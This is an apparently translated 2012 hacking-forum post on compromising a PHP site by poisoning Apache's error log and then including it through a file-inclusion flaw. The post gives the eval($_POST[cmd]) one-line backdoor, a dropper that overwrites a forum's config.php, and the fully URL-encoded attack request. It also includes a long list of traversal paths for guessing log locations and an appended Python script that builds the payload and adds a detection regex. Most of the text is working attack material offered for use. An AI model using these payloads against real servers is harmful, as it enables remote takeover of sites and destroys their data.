
PHP: including the Apache log to write a webshell

Posted 2012-9-15 14:27:40
Because the method above is very impractical (in testing I found the log is easily tens of MB, which takes the fun out of it), let's go one step further and write a real, usable webshell, which is also far better than the painfully slow approach above.

For example, still this one-line backdoor:
<?eval($_POST[cmd]);?>
(The <? short tag only executes when short_open_tag is enabled; <?php works regardless.)

By now you have probably thought of it: this is a pretty good approach. Next, how to write it becomes the question. Use this: fopen opens /home/virtual/www.xxx.com/forum/config.php and writes the one-line backdoor <?eval($_POST[cmd]);?> into it. Put together as PHP:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,'<?eval($_POST[cmd]);?>');
fclose($fp);?>   //writes the one-line backdoor into config.php

Note the single quotes around the one-liner: inside a double-quoted string PHP would interpolate $_POST[cmd] and write a broken <?eval();?> instead. Also note that "w+" truncates config.php, so the forum's own configuration is destroyed; "a" would append and keep it intact.

We submit this, get Apache to record it in the error log, then include the log and the shell is written. It must be URL-encoded to work: sent raw, the ? in <? would start the query string and only /< would reach the error log; encoded, Apache decodes the path before resolving it, so the complete PHP appears in the "File does not exist" error line (the access log keeps the request line as sent, still encoded, so nothing would execute from there).
Encoded:
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%27%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%27%29%3Bfclose%28%24fp%29%3B%3F%3E
We request
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%27%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%27%29%3Bfclose%28%24fp%29%3B%3F%3E

The error log now holds this line of webshell-writing code.
Now include the log, requesting
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

With that the webshell is written: config.php now contains the one-line backdoor.
OK.
http://www.xxx.com/forum/config.php is now our webshell.
Connect to it with lanker's client and the host is yours.

PS: Prerequisite for the above: the target directory must be writable by the user Apache/PHP runs as (e.g. www-data); world-writable -rwxrwxrwx (777) is the sure case, so check for it in the directory listing obtained earlier. Everything above also assumes you already know the log path.

For other log paths you can guess, or refer to this list:
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/access_log
../../../../../../../../../../etc/httpd/logs/access.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
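The write-the-shell procedure above, as an added example that is not part of the original post: it builds the config.php dropper with the quoting fixed, percent-encodes it, shows why the decoded error-log line is executable on include() while the access-log line is not, and adds the check a defender would run over the same logs. The document root, client address and both log lines are constructed for illustration; the target path is the one used in the post.

```python
# Added example (not code from the original post): build the config.php
# dropper correctly, see how it lands in Apache's error log versus the
# access log, and flag such log poisoning as a defender. The document root,
# client IP and log lines are constructed/assumed, not taken from the post.
import re
from urllib.parse import quote, unquote

TARGET = "/home/virtual/www.xxx.com/forum/config.php"  # path used in the post
DOCROOT = "/var/www/html"                              # assumed DocumentRoot


def build_dropper(target=TARGET):
    """PHP that writes the one-liner into `target` (fopen "w+" truncates it)."""
    # The inner one-liner sits in single quotes: inside "..." PHP would
    # interpolate $_POST[cmd] and write a broken <?eval();?> instead.
    return ('<?$fp=fopen("' + target + '","w+");'
            "fputs($fp,'<?eval($_POST[cmd]);?>');"
            'fclose($fp);?>')


def encode_for_url(payload):
    """Percent-encode everything non-alphanumeric (safe='' also encodes '/')."""
    # Essential: the '?' in '<?' would otherwise start the query string and
    # Apache would only see the path '/<'.
    return quote(payload, safe="")


def error_log_line(request_path, docroot=DOCROOT):
    """What a 2.2-style error_log records for a 404 of request_path (simulated)."""
    # Apache URL-decodes the path before resolving it against DocumentRoot,
    # so the PHP tag appears decoded here and include() will execute it.
    return ("[Sat Sep 15 14:27:40 2012] [error] [client 203.0.113.5] "
            "File does not exist: " + docroot + unquote(request_path))


def access_log_line(request_path):
    """Common-log-format line for the same request (simulated)."""
    # %r logs the request line as sent, i.e. still percent-encoded.
    return ('203.0.113.5 - - [15/Sep/2012:14:27:40 +0800] "GET '
            + request_path + ' HTTP/1.0" 404 290')


PHP_OPEN_TAG = re.compile(r"<\?")


def executes_when_included(line):
    """True if PHP would find an open tag in this line when the log is included."""
    return PHP_OPEN_TAG.search(line) is not None


# Defender's check: PHP open tags or eval(), raw or percent-encoded.
POISON = re.compile(r"<\?|%3C%3F|eval\s*\(|eval%28", re.IGNORECASE)


def flag_log_poisoning(lines):
    """Return the log lines that look like log-poisoning attempts."""
    return [line for line in lines if POISON.search(line)]


if __name__ == "__main__":
    path = "/" + encode_for_url(build_dropper())
    print("request   :", path)
    print("error_log :", error_log_line(path))
    print("access_log:", access_log_line(path))
    print("flagged   :", len(flag_log_poisoning([error_log_line(path),
                                                  access_log_line(path)])))
```

Running it prints the encoded request, the decoded error-log line (which carries a live <? tag) and the still-encoded access-log line. The defender-side regex deliberately matches both forms, since an attacker who can only reach the access log will try a payload that survives encoding, and the same logs are what a responder will be reading after the fact.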